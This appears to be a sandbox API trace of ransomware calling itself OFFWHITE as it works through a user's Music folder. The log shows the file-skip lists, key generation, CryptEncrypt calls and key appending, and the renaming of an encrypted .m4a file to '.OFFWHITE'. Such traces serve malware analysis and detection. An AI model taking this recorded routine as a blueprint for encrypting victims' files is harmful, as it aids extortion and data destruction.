lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6af2fb10, ftCreationTime.dwHighDateTime=0x1d5e74b, ftLastAccessTime.dwLowDateTime=0x60f4ce0, ftLastAccessTime.dwHighDateTime=0x1d5e52e, ftLastWriteTime.dwLowDateTime=0x60f4ce0, ftLastWriteTime.dwHighDateTime=0x1d5e52e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0xbc72d76c, cFileName=".", cAlternateFileName="")) returned 0x544750 [0135.031] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.031] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6af2fb10, ftCreationTime.dwHighDateTime=0x1d5e74b, ftLastAccessTime.dwLowDateTime=0x60f4ce0, ftLastAccessTime.dwHighDateTime=0x1d5e52e, ftLastWriteTime.dwLowDateTime=0x60f4ce0, ftLastWriteTime.dwHighDateTime=0x1d5e52e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0xbc72d76c, cFileName="..", cAlternateFileName="")) returned 1 [0135.031] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.031] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.032] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3824c10, ftCreationTime.dwHighDateTime=0x1d5d8a0, ftLastAccessTime.dwLowDateTime=0x1a3b8b10, ftLastAccessTime.dwHighDateTime=0x1d5ddfa, ftLastWriteTime.dwLowDateTime=0x1a3b8b10, ftLastWriteTime.dwHighDateTime=0x1d5ddfa, nFileSizeHigh=0x0, nFileSizeLow=0x1073a, dwReserved0=0x295d1bc, dwReserved1=0xbc72d76c, cFileName="4q6nwAt5CQhT7-W2pLN.mp3", cAlternateFileName="4Q6NWA~1.MP3")) returned 1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2=".") returned 1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="..") returned 1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="...") returned 1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="windows") returned -1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="$recycle.bin") returned 1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="rsa") returned -1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="ntuser.dat") returned -1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="programdata") returned -1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="appdata") returned -1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="program files") returned -1 [0135.032] lstrcmpiW (lpString1="4q6nwAt5CQhT7-W2pLN.mp3", lpString2="program files (x86)") returned -1 [0135.032] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" [0135.032] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\", lpString2="4q6nwAt5CQhT7-W2pLN.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\4q6nwAt5CQhT7-W2pLN.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\4q6nwAt5CQhT7-W2pLN.mp3" [0135.032] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.032] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.032] PathFindExtensionW (pszPath="4q6nwAt5CQhT7-W2pLN.mp3") returned=".mp3" [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0135.032] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0135.033] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0135.033] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1daeb0, ftCreationTime.dwHighDateTime=0x1d5de88, ftLastAccessTime.dwLowDateTime=0xa5d0b980, ftLastAccessTime.dwHighDateTime=0x1d5e641, ftLastWriteTime.dwLowDateTime=0xa5d0b980, ftLastWriteTime.dwHighDateTime=0x1d5e641, nFileSizeHigh=0x0, nFileSizeLow=0x4837, dwReserved0=0x295d1bc, dwReserved1=0xbc72d76c, cFileName="e1uGEM3lRJlqDnfz.mp3", cAlternateFileName="E1UGEM~1.MP3")) returned 1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2=".") returned 1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="..") returned 1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="...") returned 1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="windows") returned -1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="$recycle.bin") returned 1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="rsa") returned -1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="ntuser.dat") returned -1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="programdata") returned -1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="appdata") returned 1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="program files") returned -1 [0135.033] lstrcmpiW (lpString1="e1uGEM3lRJlqDnfz.mp3", lpString2="program files (x86)") returned -1 [0135.033] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" [0135.033] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\", lpString2="e1uGEM3lRJlqDnfz.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\e1uGEM3lRJlqDnfz.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\e1uGEM3lRJlqDnfz.mp3" [0135.033] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.033] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.033] PathFindExtensionW (pszPath="e1uGEM3lRJlqDnfz.mp3") returned=".mp3" [0135.033] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0135.033] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0135.033] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0135.033] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0135.033] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0135.033] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0135.033] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0135.033] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0135.034] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0135.034] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0135.034] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0135.034] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3b0ccf0, ftCreationTime.dwHighDateTime=0x1d5d97a, ftLastAccessTime.dwLowDateTime=0x1871a1c0, ftLastAccessTime.dwHighDateTime=0x1d5e4a3, ftLastWriteTime.dwLowDateTime=0x1871a1c0, ftLastWriteTime.dwHighDateTime=0x1d5e4a3, nFileSizeHigh=0x0, nFileSizeLow=0xddf8, dwReserved0=0x295d1bc, dwReserved1=0xbc72d76c, cFileName="Eak4.mp3", cAlternateFileName="")) returned 1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2=".") returned 1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="..") returned 1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="...") returned 1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="windows") returned -1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="$recycle.bin") returned 1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="rsa") returned -1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="ntuser.dat") returned -1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="programdata") returned -1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="appdata") returned 1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="program files") returned -1 [0135.034] lstrcmpiW (lpString1="Eak4.mp3", lpString2="program files (x86)") returned -1 [0135.034] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" [0135.034] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\", lpString2="Eak4.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Eak4.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Eak4.mp3" [0135.034] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.034] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.034] PathFindExtensionW (pszPath="Eak4.mp3") returned=".mp3" [0135.034] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0135.034] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0135.034] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0135.034] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0135.034] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0135.034] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0135.035] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0135.035] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0135.035] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0135.035] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0135.035] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0135.035] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1bd3c0, ftCreationTime.dwHighDateTime=0x1d5e479, ftLastAccessTime.dwLowDateTime=0xa3a5a930, ftLastAccessTime.dwHighDateTime=0x1d5e4ee, ftLastWriteTime.dwLowDateTime=0xa3a5a930, ftLastWriteTime.dwHighDateTime=0x1d5e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x4a32, dwReserved0=0x295d1bc, dwReserved1=0xbc72d76c, cFileName="Fn-s5T7t.m4a", cAlternateFileName="")) returned 1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2=".") returned 1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="..") returned 1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="...") returned 1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="windows") returned -1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="$recycle.bin") returned 1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="rsa") returned -1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="ntuser.dat") returned -1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="programdata") returned -1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="appdata") returned 1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="program files") returned -1 [0135.035] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="program files (x86)") returned -1 [0135.035] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" [0135.035] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\", lpString2="Fn-s5T7t.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a" [0135.035] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.035] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.035] PathFindExtensionW (pszPath="Fn-s5T7t.m4a") returned=".m4a" [0135.035] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0135.035] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0135.035] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0135.035] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0135.036] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0135.036] lstrcmpiW (lpString1="Fn-s5T7t.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.036] GetProcessHeap () returned 0x500000 [0135.036] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5318a0 [0135.036] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\nj5q3y tzgq\\fn-s5t7t.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.037] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=18994) returned 1 [0135.037] GetProcessHeap () returned 0x500000 [0135.037] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.037] GetProcessHeap () returned 0x500000 [0135.037] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.037] GetProcessHeap () returned 0x500000 [0135.037] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.037] GetProcessHeap () returned 0x500000 [0135.037] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.037] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.037] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.037] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.038] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.038] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.038] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.038] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.038] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.038] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.038] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.038] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.038] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.038] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4a32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.038] SetLastError (dwErrCode=0x0) [0135.038] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.040] GetLastError () returned 0x0 [0135.040] GetLastError () returned 0x0 [0135.040] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4b32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.040] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.041] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4c32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.041] WriteFile (in: hFile=0x218, lpBuffer=0x5318a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5318a0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.041] GetProcessHeap () returned 0x500000 [0135.041] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4a32) returned 0x55c7c8 [0135.041] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.041] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x4a32, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x4a32, lpOverlapped=0x0) returned 1 [0135.043] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.043] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x4a32, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x4a32, lpOverlapped=0x0) returned 1 [0135.043] GetProcessHeap () returned 0x500000 [0135.043] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.043] CloseHandle (hObject=0x218) returned 1 [0135.048] GetProcessHeap () returned 0x500000 [0135.048] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.048] GetProcessHeap () returned 0x500000 [0135.048] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.048] GetProcessHeap () returned 0x500000 [0135.048] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.048] GetProcessHeap () returned 0x500000 [0135.048] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.048] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a" [0135.048] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a.OFFWHITE" [0135.048] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\nj5q3y tzgq\\fn-s5t7t.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Fn-s5T7t.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\nj5q3y tzgq\\fn-s5t7t.m4a.offwhite")) returned 1 [0135.049] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12f44f20, ftCreationTime.dwHighDateTime=0x1d5d84d, ftLastAccessTime.dwLowDateTime=0xef6556b0, ftLastAccessTime.dwHighDateTime=0x1d5d998, ftLastWriteTime.dwLowDateTime=0xef6556b0, ftLastWriteTime.dwHighDateTime=0x1d5d998, nFileSizeHigh=0x0, nFileSizeLow=0x15f44, dwReserved0=0x295d1bc, dwReserved1=0xbc72d76c, cFileName="VyzggtM.mp3", cAlternateFileName="")) returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2=".") returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="..") returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="...") returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="windows") returned -1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="$recycle.bin") returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="rsa") returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="ntuser.dat") returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="programdata") returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="appdata") returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="program files") returned 1 [0135.049] lstrcmpiW (lpString1="VyzggtM.mp3", lpString2="program files (x86)") returned 1 [0135.049] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" [0135.049] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\", lpString2="VyzggtM.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\VyzggtM.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\VyzggtM.mp3" [0135.049] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.049] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.050] PathFindExtensionW (pszPath="VyzggtM.mp3") returned=".mp3" [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0135.050] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0135.050] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, 